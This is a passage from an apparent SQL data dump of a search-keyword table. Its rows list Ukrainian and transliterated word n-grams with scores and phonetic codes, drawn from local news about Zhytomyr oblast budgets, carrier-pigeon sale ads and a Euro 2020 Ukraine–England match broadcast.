ринкова',0,1,1.4333,'ч000',1,'*'),(1647430,'чином ринкова ціна','чином ринкова ціна',0,1,1.6,'ч000',1,'*'),(1647431,'штучно','штучно',0,0,0.4,'ш000',1,'*'),(1647432,'штучно створює','штучно створює',0,1,1.4667,'ш000',1,'*'),(1647433,'штучно створює дефіцит','штучно створює дефіцит',0,1,1.7333,'ш000',1,'*'),(1647434,'що трохи','що трохи',0,1,1.2667,'щ000',1,'*'),(1647435,'що трохи більше','що трохи більше',0,1,1.5,'щ000',1,'*'),(1647436,'як базова','як базова',0,1,1.3,'я000',1,'*'),(1647437,'як базова діє','як базова діє',0,1,1.4333,'я000',1,'*'),(1647438,'який штучно','який штучно',0,1,1.3667,'я000',1,'*'),(1647439,'який штучно створює','який штучно створює',0,1,1.6333,'я000',1,'*'),(1647935,'2 2520','2 2520',0,1,1.2,'',1,'*'),(1647936,'2 2520 vikonannya','2 2520 vikonannya',0,1,1.5667,'V250',1,'*'),(1647937,'2520','2520',0,0,0.4,'',1,'*'),(1647938,'2520 vikonannya','2520 vikonannya',0,1,1.5,'V250',1,'*'),(1647939,'2520 vikonannya dokhidnoji','2520 vikonannya dokhidnoji',0,1,1.8667,'V2532352',1,'*'),(1647940,'5 misyatsiv','5 misyatsiv',0,1,1.3667,'M2321',1,'*'),(1647941,'5 misyatsiv 2021','5 misyatsiv 2021',0,1,1.5333,'M2321',1,'*'),(1647942,'5 місяців','5 місяців',0,1,1.3,'м000',1,'*'),(1647943,'5 місяців 2021','5 місяців 2021',0,1,1.4667,'м000',1,'*'),(1647944,'misyatsiv 2021','misyatsiv 2021',0,1,1.4667,'M2321',1,'*'),(1647945,'misyatsiv 2021 roku','misyatsiv 2021 roku',0,1,1.6333,'M232162',1,'*'),(1647946,'novini 2 2520','novini 2 2520',0,1,1.4333,'N150',1,'*'),(1647947,'oblasti za 5','oblasti za 5',0,1,1.4,'O14232',1,'*'),(1647948,'za 5','za 5',0,1,1.1333,'Z000',1,'*'),(1647949,'za 5 misyatsiv','za 5 misyatsiv',0,1,1.4667,'Z52321',1,'*'),(1647950,'бюджетів отг','бюджетів отг',0,1,1.4,'б000',3,'*'),(1647951,'бюджетів отг житомирської','бюджетів отг житомирської',0,1,1.8333,'б000',3,'*'),(1647952,'житомирської області за','житомирської області за',0,1,1.7667,'ж000',3,'*'),(1647953,'за 5','за 5',0,1,1.1333,'з000',1,'*'),(1647954,'за 5 місяців','за 5 місяців',0,1,1.4,'з000',1,'*'),(1647955,'місяців 2021','місяців 2021',0,1,1.4,'м000',1,'*'),(1647956,'місяців 2021 року','місяців 2021 року',0,1,1.5667,'м000',1,'*'),(1647957,'області за','області за',0,1,1.3333,'о000',3,'*'),(1647958,'області за 5','області за 5',0,1,1.4,'о000',1,'*'),(1647959,'отг житомирської','отг житомирської',0,1,1.5333,'о000',3,'*'),(1647960,'отг житомирської області','отг житомирської області',0,1,1.8,'о000',3,'*'),(1647961,'частини бюджетів отг','частини бюджетів отг',0,1,1.6667,'ч000',3,'*'),(1647966,'21 року','21 року',0,1,1.2333,'р000',2,'*'),(1647967,'21 року так','21 року так',0,1,1.3667,'р000',1,'*'),(1647968,'2521','2521',0,0,0.4,'',1,'*'),(1647969,'2521 molodi','2521 molodi',0,1,1.3667,'M430',1,'*'),(1647970,'2521 molodi poshtovi','2521 molodi poshtovi',0,1,1.6667,'M431231',1,'*'),(1647971,'gotovi','gotovi',0,0,0.4,'G310',1,'*'),(1647972,'gotovi pominyati','gotovi pominyati',0,1,1.5333,'G3153',1,'*'),(1647973,'gotovi pominyati propisku','gotovi pominyati propisku',0,1,1.8333,'G31531612',1,'*'),(1647974,'holuby poshtovi','holuby poshtovi',0,1,1.5,'H41231',4,'*'),(1647975,'holuby poshtovi 2521','holuby poshtovi 2521',0,1,1.6667,'H41231',1,'*'),(1647976,'molodi poshtovi gotovi','molodi poshtovi gotovi',0,1,1.7333,'M431231231',1,'*'),(1647977,'pominyati','pominyati',0,0,0.6,'P530',1,'*'),(1647978,'pominyati propisku','pominyati propisku',0,1,1.6,'P531612',1,'*'),(1647979,'poshtovi 2521','poshtovi 2521',0,1,1.4333,'P231',1,'*'),(1647980,'poshtovi 2521 molodi','poshtovi 2521 molodi',0,1,1.6667,'P231543',1,'*'),(1647981,'poshtovi gotovi','poshtovi gotovi',0,1,1.5,'P231231',1,'*'),(1647982,'poshtovi gotovi pominyati','poshtovi gotovi pominyati',0,1,1.8333,'P23123153',1,'*'),(1647983,'propisku','propisku',0,0,0.5333,'P612',2,'*'),(1647984,'є птиця 21','є птиця 21',0,1,1.3333,'є000',1,'*'),(1647985,'вінницю овруч хмільник','вінницю овруч хмільник',0,1,1.7333,'в000',2,'*'),(1647986,'готові','готові',0,0,0.4,'г000',1,'*'),(1647987,'готові поміняти','готові поміняти',0,1,1.5,'г000',1,'*'),(1647988,'готові поміняти прописку','готові поміняти прописку',0,1,1.8,'г000',1,'*'),(1647989,'житомирської області є','житомирської області є',0,1,1.7333,'ж000',2,'*'),(1647990,'локація','локація',0,0,0.4667,'л000',3,'*'),(1647991,'локація м','локація м',0,1,1.3,'л000',3,'*'),(1647992,'локація м малин','локація м малин',0,1,1.5,'л000',3,'*'),(1647993,'м малин житомирської','м малин житомирської',0,1,1.6667,'м000',2,'*'),(1647994,'малин житомирської','малин житомирської',0,1,1.6,'м000',2,'*'),(1647995,'малин житомирської області','малин житомирської області',0,1,1.8667,'м000',2,'*'),(1647996,'минулих років локація','минулих років локація',0,1,1.7,'м000',1,'*'),(1647997,'молоді поштові готові','молоді поштові готові',0,1,1.7,'м000',1,'*'),(1647998,'області є','області є',0,1,1.3,'о000',2,'*'),(1647999,'області є можливість','області є можливість',0,1,1.6667,'о000',2,'*'),(1648000,'овруч хмільник','овруч хмільник',0,1,1.4667,'о000',2,'*'),(1648001,'овруч хмільник ціна','овруч хмільник ціна',0,1,1.6333,'о000',2,'*'),(1648002,'поміняти','поміняти',0,0,0.5333,'п000',1,'*'),(1648003,'поміняти прописку','поміняти прописку',0,1,1.5667,'п000',1,'*'),(1648004,'поштові готові','поштові готові',0,1,1.4667,'п000',1,'*'),(1648005,'поштові готові поміняти','поштові готові поміняти',0,1,1.7667,'п000',1,'*'),(1648006,'прописку','прописку',0,0,0.5333,'п000',2,'*'),(1648007,'птиця 21','птиця 21',0,1,1.2667,'п000',1,'*'),(1648008,'птиця 21 року','птиця 21 року',0,1,1.4333,'п000',1,'*'),(1648009,'років локація','років локація',0,1,1.4333,'р000',1,'*'),(1648010,'років локація м','років локація м',0,1,1.5,'р000',1,'*'),(1648011,'хмільник ціна','хмільник ціна',0,1,1.4333,'х000',2,'*'),(1648012,'хмільник ціна 100','хмільник ціна 100',0,1,1.5667,'х000',1,'*'),(1648029,'19 року','19 року',0,1,1.2333,'р000',1,'*'),(1648030,'19 року та','19 року та',0,1,1.3333,'р000',1,'*'),(1648031,'20 року спаровані','20 року спаровані',0,1,1.5667,'р000',1,'*'),(1648032,'2522','2522',0,0,0.4,'',1,'*'),(1648033,'2522 shokoladna','2522 shokoladna',0,1,1.5,'S435',1,'*'),(1648034,'2522 shokoladna parochka','2522 shokoladna parochka',0,1,1.8,'S435162',1,'*'),(1648035,'300 за','300 за',0,1,1.2,'з000',1,'*'),(1648036,'300 за одного','300 за одного',0,1,1.4333,'з000',1,'*'),(1648037,'holuby kinhy 2522','holuby kinhy 2522',0,1,1.5667,'H4125',1,'*'),(1648038,'kinhy 2522','kinhy 2522',0,1,1.3333,'K500',1,'*'),(1648039,'kinhy 2522 shokoladna','kinhy 2522 shokoladna',0,1,1.7,'K52435',1,'*'),(1648040,'parochka','parochka',0,0,0.5333,'P620',1,'*'),(1648041,'parochka pominyae','parochka pominyae',0,1,1.5667,'P6215',1,'*'),(1648042,'parochka pominyae propisku','parochka pominyae propisku',0,1,1.8667,'P62151612',1,'*'),(1648043,'pominyae','pominyae',0,0,0.5333,'P500',1,'*'),(1648044,'pominyae propisku','pominyae propisku',0,1,1.5667,'P51612',1,'*'),(1648045,'shokoladna','shokoladna',0,0,0.6667,'S435',1,'*'),(1648046,'shokoladna parochka','shokoladna parochka',0,1,1.6333,'S435162',1,'*'),(1648047,'shokoladna parochka pominyae','shokoladna parochka pominyae',0,1,1.9333,'S43516215',1,'*'),(1648048,'голуб 19','голуб 19',0,1,1.2667,'г000',1,'*'),(1648049,'голуб 19 року','голуб 19 року',0,1,1.4333,'г000',1,'*'),(1648050,'за одного','за одного',0,1,1.3,'з000',1,'*'),(1648051,'за одного телефонуйте','за одного телефонуйте',0,1,1.7,'з000',1,'*'),(1648052,'одного','одного',0,0,0.4,'о000',2,'*'),(1648053,'одного телефонуйте','одного телефонуйте',0,1,1.6,'о000',1,'*'),(1648054,'одного телефонуйте 0508320922','одного телефонуйте 0508320922',0,1,1.9667,'о000',1,'*'),(1648055,'парочка','парочка',0,0,0.4667,'п000',1,'*'),(1648056,'парочка поміняє','парочка поміняє',0,1,1.5,'п000',1,'*'),(1648057,'парочка поміняє прописку','парочка поміняє прописку',0,1,1.8,'п000',1,'*'),(1648058,'поміняє','поміняє',0,0,0.4667,'п000',1,'*'),(1648059,'поміняє прописку','поміняє прописку',0,1,1.5333,'п000',1,'*'),(1648060,'року спаровані','року спаровані',0,1,1.4667,'р000',1,'*'),(1648061,'року спаровані локація','року спаровані локація',0,1,1.7333,'р000',1,'*'),(1648062,'року та','року та',0,1,1.2333,'р000',2,'*'),(1648063,'року та самочка','року та самочка',0,1,1.5,'р000',1,'*'),(1648064,'самочка 20','самочка 20',0,1,1.3333,'с000',1,'*'),(1648065,'самочка 20 року','самочка 20 року',0,1,1.5,'с000',1,'*'),(1648066,'спаровані','спаровані',0,0,0.6,'с000',1,'*'),(1648067,'спаровані локація','спаровані локація',0,1,1.5667,'с000',1,'*'),(1648068,'спаровані локація м','спаровані локація м',0,1,1.6333,'с000',1,'*'),(1648069,'та самочка','та самочка',0,1,1.3333,'т000',1,'*'),(1648070,'та самочка 20','та самочка 20',0,1,1.4333,'т000',1,'*'),(1648071,'хмільник ціна 300','хмільник ціна 300',0,1,1.5667,'х000',1,'*'),(1648072,'ціна 300 за','ціна 300 за',0,1,1.3667,'ц000',1,'*'),(1648073,'шоколадна','шоколадна',0,0,0.6,'ш000',1,'*'),(1648074,'шоколадна парочка','шоколадна парочка',0,1,1.5667,'ш000',1,'*'),(1648075,'шоколадна парочка поміняє','шоколадна парочка поміняє',0,1,1.8333,'ш000',1,'*'),(1648296,'2523','2523',0,0,0.4,'',1,'*'),(1648297,'2523 poshtovi','2523 poshtovi',0,1,1.4333,'P231',1,'*'),(1648298,'2523 poshtovi molodi','2523 poshtovi molodi',0,1,1.6667,'P231543',1,'*'),(1648299,'holuby poshtovi 2523','holuby poshtovi 2523',0,1,1.6667,'H41231',1,'*'),(1648300,'poshtovi 2523','poshtovi 2523',0,1,1.4333,'P231',1,'*'),(1648301,'poshtovi 2523 poshtovi','poshtovi 2523 poshtovi',0,1,1.7333,'P231231',1,'*'),(1648302,'poshtovi molodi','poshtovi molodi',0,1,1.5,'P231543',1,'*'),(1648303,'голуби поштові','голуби поштові',0,1,1.4667,'г000',1,'*'),(1648304,'голуби поштові молоді','голуби поштові молоді',0,1,1.7,'г000',1,'*'),(1648305,'дзвоніть 0508320922','дзвоніть 0508320922',0,1,1.6333,'д000',1,'*'),(1648306,'дзвоніть 0508320922 домовимось','дзвоніть 0508320922 домовимось',0,1,2,'д000',1,'*'),(1648307,'житомрської','житомрської',0,0,0.7333,'ж000',1,'*'),(1648308,'житомрської області','житомрської області',0,1,1.6333,'ж000',1,'*'),(1648309,'житомрської області можу','житомрської області можу',0,1,1.8,'ж000',1,'*'),(1648310,'м малин житомрської','м малин житомрської',0,1,1.6333,'м000',1,'*'),(1648311,'малин житомрської','малин житомрської',0,1,1.5667,'м000',1,'*'),(1648312,'малин житомрської області','малин житомрської області',0,1,1.8333,'м000',1,'*'),(1648313,'маршруткою','маршруткою',0,0,0.6667,'м000',1,'*'),(1648314,'маршруткою передати','маршруткою передати',0,1,1.6333,'м000',1,'*'),(1648315,'маршруткою передати в','маршруткою передати в',0,1,1.7,'м000',1,'*'),(1648316,'можу','можу',0,0,0.2667,'м000',1,'*'),(1648317,'можу маршруткою','можу маршруткою',0,1,1.5,'м000',1,'*'),(1648318,'можу маршруткою передати','можу маршруткою передати',0,1,1.8,'м000',1,'*'),(1648319,'молоді необлітані','молоді необлітані',0,1,1.5667,'м000',1,'*'),(1648320,'молоді необлітані локація','молоді необлітані локація',0,1,1.8333,'м000',1,'*'),(1648321,'необлітані','необлітані',0,0,0.6667,'н000',1,'*'),(1648322,'необлітані локація','необлітані локація',0,1,1.6,'н000',1,'*'),(1648323,'необлітані локація м','необлітані локація м',0,1,1.6667,'н000',1,'*'),(1648324,'області можу','області можу',0,1,1.4,'о000',1,'*'),(1648325,'області можу маршруткою','області можу маршруткою',0,1,1.7667,'о000',1,'*'),(1648326,'овруч дзвоніть 0508320922','овруч дзвоніть 0508320922',0,1,1.8333,'о000',1,'*'),(1648327,'передати в','передати в',0,1,1.3333,'п000',1,'*'),(1648328,'передати в київ','передати в київ',0,1,1.5,'п000',1,'*'),(1648329,'поштові молоді','поштові молоді',0,1,1.4667,'п000',1,'*'),(1648330,'поштові молоді необлітані','поштові молоді необлітані',0,1,1.8333,'п000',1,'*'),(1672152,'0 трапилася','0 трапилася',0,1,1.3667,'т000',1,'*'),(1672153,'0 трапилася у','0 трапилася у',0,1,1.4333,'т000',1,'*'),(1672154,'00','00',0,0,0.2,'',1,'*'),(1672155,'00 матч','00 матч',0,1,1.2333,'м000',1,'*'),(1672156,'00 матч у','00 матч у',0,1,1.3,'м000',1,'*'),(1672157,'1 0','1 0',0,1,1.1,'',1,'*'),(1672158,'1 0 трапилася','1 0 трапилася',0,1,1.4333,'т000',1,'*'),(1672159,'1 4','1 4',0,1,1.1,'',1,'*'),(1672160,'1 4 чемпіонату','1 4 чемпіонату',0,1,1.4667,'ч000',1,'*'),(1672161,'1 поразка','1 поразка',0,1,1.3,'п000',1,'*'),(1672162,'1 поразка єдина','1 поразка єдина',0,1,1.5,'п000',1,'*'),(1672163,'1 починаючи','1 починаючи',0,1,1.3667,'п000',1,'*'),(1672164,'1 починаючи з','1 починаючи з',0,1,1.4333,'п000',1,'*'),(1672165,'2 2524','2 2524',0,1,1.2,'',1,'*'),(1672166,'2 2524 ukrajina','2 2524 ukrajina',0,1,1.5,'U2625',1,'*'),(1672167,'2 нічиї','2 нічиї',0,1,1.2333,'н000',1,'*'),(1672168,'2 нічиї 1','2 нічиї 1',0,1,1.3,'н000',1,'*'),(1672169,'21 50','21 50',0,1,1.1667,'',1,'*'),(1672170,'21 50 поєдинок','21 50 поєдинок',0,1,1.4667,'п000',1,'*'),(1672171,'21 50 трк','21 50 трк',0,1,1.3,'т000',1,'*'),(1672172,'22','22',0,0,0.2,'',1,'*'),(1672173,'22 00','22 00',0,1,1.1667,'',1,'*'),(1672174,'22 00 матч','22 00 матч',0,1,1.3333,'м000',1,'*'),(1672175,'2524','2524',0,0,0.4,'',1,'*'),(1672176,'2524 ukrajina','2524 ukrajina',0,1,1.4333,'U2625',1,'*'),(1672177,'2524 ukrajina angliya','2524 ukrajina angliya',0,1,1.7,'U262524',1,'*'),(1672178,'3 липня','3 липня',0,1,1.2333,'л000',1,'*'),(1672179,'3 липня початок','3 липня початок',0,1,1.5,'л000',1,'*'),(1672180,'4 перемоги','4 перемоги',0,1,1.3333,'п000',1,'*'),(1672181,'4 перемоги 2','4 перемоги 2',0,1,1.4,'п000',1,'*'),(1672182,'4 чемпіонату','4 чемпіонату',0,1,1.4,'ч000',1,'*'),(1672183,'4 чемпіонату європи','4 чемпіонату європи',0,1,1.6333,'ч000',1,'*'),(1672184,'50 поєдинок','50 поєдинок',0,1,1.3667,'п000',1,'*'),(1672185,'50 поєдинок на','50 поєдинок на',0,1,1.4667,'п000',1,'*'),(1672186,'50 трк','50 трк',0,1,1.2,'т000',1,'*'),(1672187,'50 трк україна','50 трк україна',0,1,1.4667,'т000',1,'*'),(1672188,'7 разів','7 разів',0,1,1.2333,'р000',1,'*'),(1672189,'7 разів перевага','7 разів перевага',0,1,1.5333,'р000',1,'*'),(1672190,'angliya','angliya',0,0,0.4667,'A524',1,'*'),(1672191,'angliya de','angliya de',0,1,1.3333,'A5243',1,'*'),(1672192,'angliya de divitisya','angliya de divitisya',0,1,1.6667,'A5243132',1,'*'),(1672193,'chempionatu','chempionatu',0,0,0.7333,'C5153',1,'*'),(1672194,'chempionatu evropi','chempionatu evropi',0,1,1.6,'C5153161',1,'*'),(1672195,'chempionatu evropi 2020','chempionatu evropi 2020',0,1,1.7667,'C5153161',1,'*'),(1672196,'de','de',0,0,0.1333,'D000',1,'*'),(1672197,'de divitisya','de divitisya',0,1,1.4,'D132',1,'*'),(1672198,'de divitisya match','de divitisya match',0,1,1.6,'D132532',1,'*'),(1672199,'divitisya','divitisya',0,0,0.6,'D132',1,'*'),(1672200,'divitisya match','divitisya match',0,1,1.5,'D132532',1,'*'),(1672201,'divitisya match chempionatu','divitisya match chempionatu',0,1,1.9,'D1325325153',1,'*'),(1672202,'evropi','evropi',0,0,0.4,'E161',1,'*'),(1672203,'evropi 2020','evropi 2020',0,1,1.3667,'E161',1,'*'),(1672204,'match','match',0,0,0.3333,'M320',1,'*'),(1672205,'match chempionatu','match chempionatu',0,1,1.5667,'M325153',1,'*'),(1672206,'match chempionatu evropi','match chempionatu evropi',0,1,1.8,'M325153161',1,'*'),(1672207,'megogo','megogo',0,0,0.4,'M200',1,'*'),(1672208,'megogo за','megogo за',0,1,1.3,'M200',1,'*'),(1672209,'megogo за наявності','megogo за наявності',0,1,1.6333,'M200',1,'*'),(1672210,'novini 2 2524','novini 2 2524',0,1,1.4333,'N150',1,'*'),(1672211,'oll','oll',0,0,0.2,'O400',1,'*'),(1672212,'oll tv','oll tv',0,1,1.2,'O431',1,'*'),(1672213,'oll tv за','oll tv за',0,1,1.3,'O431',1,'*'),(1672214,'tv','tv',0,0,0.1333,'T100',1,'*'),(1672215,'tv за','tv за',0,1,1.1667,'T100',1,'*'),(1672216,'tv за наявності','tv за наявності',0,1,1.5,'T100',1,'*'),(1672217,'ukrajina','ukrajina',0,0,0.5333,'U2625',1,'*'),(1672218,'ukrajina angliya','ukrajina angliya',0,1,1.5333,'U262524',1,'*'),(1672219,'ukrajina angliya de','ukrajina angliya de',0,1,1.6333,'U2625243',1,'*'),(1672220,'європи','європи',0,0,0.4,'є000',1,'*'),(1672221,'європи початок','європи початок',0,1,1.4667,'є000',1,'*'),(1672222,'європи початок трансляції','європи початок трансляції',0,1,1.8333,'є000',1,'*'),(1672223,'європи-2020','європи-2020',0,0,0.7333,'є000',1,'*'),(1672224,'єдина','єдина',0,0,0.3333,'є000',1,'*'),(1672225,'єдина перемога','єдина перемога',0,1,1.4667,'є000',1,'*'),(1672226,'єдина перемога синьо-жовтих','єдина перемога синьо-жовтих',0,1,1.9,'є000',1,'*'),(1672227,'англії','англії',0,0,0.4,'а000',1,'*'),(1672228,'англії зустрічалися','англії зустрічалися',0,1,1.6333,'а000',1,'*'),(1672229,'англії зустрічалися раніше','англії зустрічалися раніше',0,1,1.8667,'а000',1,'*'),(1672230,'англія','англія',0,0,0.4,'а000',1,'*'),(1672231,'англія відбудеться','англія відбудеться',0,1,1.6,'а000',1,'*'),(1672232,'англія відбудеться у','англія відбудеться у',0,1,1.6667,'а000',1,'*'),(1672233,'англія де','англія де',0,1,1.3,'а000',1,'*'),(1672234,'англія де дивитися','англія де дивитися',0,1,1.6,'а000',1,'*'),(1672235,'англія онлайн','англія онлайн',0,1,1.4333,'а000',1,'*'),(1672236,'англія онлайн можна','англія онлайн можна',0,1,1.6333,'а000',1,'*'),(1672237,'боці','боці',0,0,0.2667,'б000',1,'*'),(1672238,'боці трьох','боці трьох',0,1,1.3333,'б000',1,'*'),(1672239,'боці трьох левів','боці трьох левів',0,1,1.5333,'б000',1,'*'),(1672240,'в 1','в 1',0,1,1.1,'в000',1,'*'),(1672241,'в 1 4','в 1 4',0,1,1.1667,'в000',1,'*'),(1672242,'в прямому','в прямому',0,1,1.3,'в000',1,'*'),(1672243,'в прямому ефірі','в прямому ефірі',0,1,1.5,'в000',1,'*'),(1672244,'відбудеться','відбудеться',0,0,0.7333,'в000',1,'*'),(1672245,'відбудеться у','відбудеться у',0,1,1.4333,'в000',1,'*'),(1672246,'відбудеться у римі','відбудеться у римі',0,1,1.6,'в000',1,'*'),(1672247,'відповідної','відповідної',0,0,0.7333,'в000',1,'*'),(1672248,'відповідної підписки','відповідної підписки',0,1,1.6667,'в000',1,'*'),(1672249,'відповідної підписки крім','відповідної підписки крім',0,1,1.8333,'в000',1,'*'),(1672250,'гру','гру',0,0,0.2,'г000',1,'*'),(1672251,'гру можна','гру можна',0,1,1.3,'г000',1,'*'),(1672252,'гру можна переглянути','гру можна переглянути',0,1,1.7,'г000',1,'*'),(1672253,'де дивитися','де дивитися',0,1,1.3667,'д000',1,'*'),(1672254,'де дивитися матч','де дивитися матч',0,1,1.5333,'д000',1,'*'),(1672255,'дивитись','дивитись',0,0,0.5333,'д000',1,'*'),(1672256,'дивитись матч','дивитись матч',0,1,1.4333,'д000',1,'*'),(1672257,'дивитись матч україна','дивитись матч україна',0,1,1.7,'д000',1,'*'),(1672258,'дивитися','дивитися',0,0,0.5333,'д000',1,'*'),(1672259,'дивитися матч','дивитися матч',0,1,1.4333,'д000',1,'*'),(1672260,'дивитися матч чемпіонату','дивитися матч чемпіонату',0,1,1.8,'д000',1,'*'),(1672261,'для довідки','для довідки',0,1,1.3667,'д000',1,'*'),(1672262,'для довідки збірні','для довідки збірні',0,1,1.6,'д000',1,'*'),(1672263,'дніпрі','дніпрі',0,0,0.4,'д000',1,'*'),(1672264,'дніпрі тоді','дніпрі тоді',0,1,1.3667,'д000',1,'*'),(1672265,'дніпрі тоді забив','дніпрі тоді забив',0,1,1.5667,'д000',1,'*'),(1672266,'до чс-2010','до чс-2010',0,1,1.3333,'д000',1,'*'),(1672267,'до чс-2010 переможний','до чс-2010 переможний',0,1,1.7,'д000',1,'*'),(1672268,'довідки','довідки',0,0,0.4667,'д000',1,'*'),(1672269,'довідки збірні','довідки збірні',0,1,1.4667,'д000',1,'*'),(1672270,'довідки збірні україни','довідки збірні україни',0,1,1.7333,'д000',1,'*'),(1672271,'ефірі','ефірі',0,0,0.3333,'е000',1,'*'),(1672272,'ефірі на','ефірі на',0,1,1.2667,'е000',1,'*'),(1672273,'ефірі на телеканалі','ефірі на телеканалі',0,1,1.6333,'е000',1,'*'),(1672274,'ефірі на території','ефірі на території',0,1,1.6,'е000',1,'*'),(1672275,'з 21','з 21',0,1,1.1333,'з000',1,'*'),(1672276,'з 21 50','з 21 50',0,1,1.2333,'з000',1,'*'),(1672277,'за наявності','за наявності',0,1,1.4,'з000',1,'*'),(1672278,'за наявності відповідної','за наявності відповідної',0,1,1.8,'з000',1,'*'),(1672279,'за наявності оплаченої','за наявності оплаченої',0,1,1.7333,'з000',1,'*'),(1672280,'забив','забив',0,0,0.3333,'з000',1,'*'),(1672281,'забив сергій','забив сергій',0,1,1.4,'з000',1,'*'),(1672282,'забив сергій назаренко','забив сергій назаренко',0,1,1.7333,'з000',1,'*'),(1672283,'збірні','збірні',0,0,0.4,'з000',1,'*'),(1672284,'збірні україни','збірні україни',0,1,1.4667,'з000',1,'*'),(1672285,'збірні україни та','збірні україни та',0,1,1.5667,'з000',1,'*'),(1672286,'зустрічалися','зустрічалися',0,0,0.8,'з000',1,'*'),(1672287,'зустрічалися раніше','зустрічалися раніше',0,1,1.6333,'з000',1,'*'),(1672288,'зустрічалися раніше 7','зустрічалися раніше 7',0,1,1.7,'з000',1,'*'),(1672289,'кілька','кілька',0,0,0.4,'к000',2,'*'),(1672290,'кілька трансляторів','кілька трансляторів',0,1,1.6333,'к000',1,'*'),(1672291,'кілька трансляторів дивитись','кілька трансляторів дивитись',0,1,1.9333,'к000',1,'*'),(1672292,'кваліфікації','кваліфікації',0,0,0.8,'к000',1,'*'),(1672293,'кваліфікації до','кваліфікації до',0,1,1.5,'к000',1,'*'),(1672294,'кваліфікації до чс-2010','кваліфікації до чс-2010',0,1,1.7667,'к000',1,'*'),(1672295,'команди шевченка','команди шевченка',0,1,1.5333,'к000',1,'*'),(1672296,'команди шевченка в','команди шевченка в',0,1,1.6,'к000',1,'*'),(1672297,'крім того','крім того',0,1,1.3,'к000',1,'*'),(1672298,'крім того гру','крім того гру',0,1,1.4333,'к000',1,'*'),(1672299,'левів','левів',0,0,0.3333,'л000',1,'*'),(1672300,'левів 4','левів 4',0,1,1.2333,'л000',1,'*'),(1672301,'левів 4 перемоги','левів 4 перемоги',0,1,1.5333,'л000',1,'*'),(1672302,'липня','липня',0,0,0.3333,'л000',3,'*'),(1672303,'липня початок','липня початок',0,1,1.4333,'л000',1,'*'),(1672304,'липня початок матчу','липня початок матчу',0,1,1.6333,'л000',1,'*'),(1672305,'м\'яч','м',0,0,0.2667,'м000',1,'*'),(1672306,'м\'яч у','м у',0,1,1.2,'м000',1,'*'),(1672307,'м\'яч у дніпрі','м у дніпрі',0,1,1.4333,'м000',1,'*'),(1672308,'матч команди','матч команди',0,1,1.4,'м000',1,'*'),(1672309,'матч команди шевченка','матч команди шевченка',0,1,1.7,'м000',1,'*'),(1672310,'матч у','матч у',0,1,1.2,'м000',1,'*'),(1672311,'матч у прямому','матч у прямому',0,1,1.4667,'м000',1,'*'),(1672312,'матч україна','матч україна',0,1,1.4,'м000',1,'*'),(1672313,'матч україна англія','матч україна англія',0,1,1.6333,'м000',1,'*'),(1672314,'матч чемпіонату','матч чемпіонату',0,1,1.5,'м000',1,'*'),(1672315,'матч чемпіонату європи-2020','матч чемпіонату європи-2020',0,1,1.9,'м000',1,'*'),(1672316,'матчу','матчу',0,0,0.3333,'м000',1,'*'),(1672317,'матчу о','матчу о',0,1,1.2333,'м000',1,'*'),(1672318,'матчу о 22','матчу о 22',0,1,1.3333,'м000',1,'*'),(1672319,'можна на','можна на',0,1,1.2667,'м000',1,'*'),(1672320,'можна на платфо','можна на платфо',0,1,1.5,'м000',1,'*'),(1672321,'можна переглянути онлайн','можна переглянути онлайн',0,1,1.8,'м000',1,'*'),(1672322,'нічиї','нічиї',0,0,0.3333,'н000',1,'*'),(1672323,'нічиї 1','нічиї 1',0,1,1.2333,'н000',1,'*'),(1672324,'нічиї 1 поразка','нічиї 1 поразка',0,1,1.5,'н000',1,'*'),(1672325,'на megogo','на megogo',0,1,1.3,'н520',1,'*'),(1672326,'на megogo за','на megogo за',0,1,1.4,'н520',1,'*'),(1672327,'на боці','на боці',0,1,1.2333,'н000',1,'*'),(1672328,'на боці трьох','на боці трьох',0,1,1.4333,'н000',1,'*'),(1672329,'на платфо','на платфо',0,1,1.3,'н000',1,'*'),(1672330,'на платфо рмі','на платфо рмі',0,1,1.4333,'н000',1,'*'),(1672331,'на стадіо','на стадіо',0,1,1.3,'н000',1,'*'),(1672332,'на стадіо олімпіко','на стадіо олімпіко',0,1,1.6,'н000',1,'*'),(1672333,'на телеканалі','на телеканалі',0,1,1.4333,'н000',1,'*'),(1672334,'на телеканалі футбол','на телеканалі футбол',0,1,1.6667,'н000',1,'*'),(1672335,'на території','на території',0,1,1.4,'н000',1,'*'),(1672336,'на території україни','на території україни',0,1,1.6667,'н000',1,'*'),(1672337,'на трк','на трк',0,1,1.2,'н000',1,'*'),(1672338,'на трк україна','на трк україна',0,1,1.4667,'н000',1,'*'),(1672339,'назаренко','назаренко',0,0,0.6,'н000',1,'*'),(1672340,'наявності відповідної','наявності відповідної',0,1,1.7,'н000',1,'*'),(1672341,'наявності відповідної підписки','наявності відповідної підписки',0,1,2,'н000',1,'*'),(1672342,'наявності оплаченої','наявності оплаченої',0,1,1.6333,'н000',1,'*'),(1672343,'наявності оплаченої підписки','наявності оплаченої підписки',0,1,1.9333,'н000',1,'*'),(1672344,'о 21','о 21',0,1,1.1333,'о000',1,'*'),(1672345,'о 21 50','о 21 50',0,1,1.2333,'о000',1,'*'),(1672346,'о 22','о 22',0,1,1.1333,'о000',1,'*'),(1672347,'о 22 00','о 22 00',0,1,1.2333,'о000',1,'*'),(1672348,'олімпіко','олімпіко',0,0,0.5333,'о000',1,'*'),(1672349,'олімпіко 3','олімпіко 3',0,1,1.3333,'о000',1,'*'),(1672350,'олімпіко 3 липня','олімпіко 3 липня',0,1,1.5333,'о000',1,'*'),(1672351,'онлайн можна','онлайн можна',0,1,1.4,'о000',1,'*'),(1672352,'онлайн можна на','онлайн можна на',0,1,1.5,'о000',1,'*'),(1672353,'онлайн на','онлайн на',0,1,1.3,'о000',1,'*'),(1672354,'онлайн на megogo','онлайн на megogo',0,1,1.5333,'о520',1,'*'),(1672355,'оплаченої','оплаченої',0,0,0.6,'о000',1,'*'),(1672356,'оплаченої підписки','оплаченої підписки',0,1,1.6,'о000',1,'*'),(1672357,'оплаченої підписки для','оплаченої підписки для',0,1,1.7333,'о000',1,'*'),(1672358,'підписки','підписки',0,0,0.5333,'п000',1,'*'),(1672359,'підписки для','підписки для',0,1,1.4,'п000',1,'*'),(1672360,'підписки для довідки','підписки для довідки',0,1,1.6667,'п000',1,'*'),(1672361,'підписки крім','підписки крім',0,1,1.4333,'п000',1,'*'),(1672362,'підписки крім того','підписки крім того',0,1,1.6,'п000',1,'*'),(1672363,'перевага на','перевага на',0,1,1.3667,'п000',1,'*'),(1672364,'перевага на боці','перевага на боці',0,1,1.5333,'п000',1,'*'),(1672365,'переглянути в прямому','переглянути в прямому',0,1,1.7,'п000',1,'*'),(1672366,'переглянути онлайн','переглянути 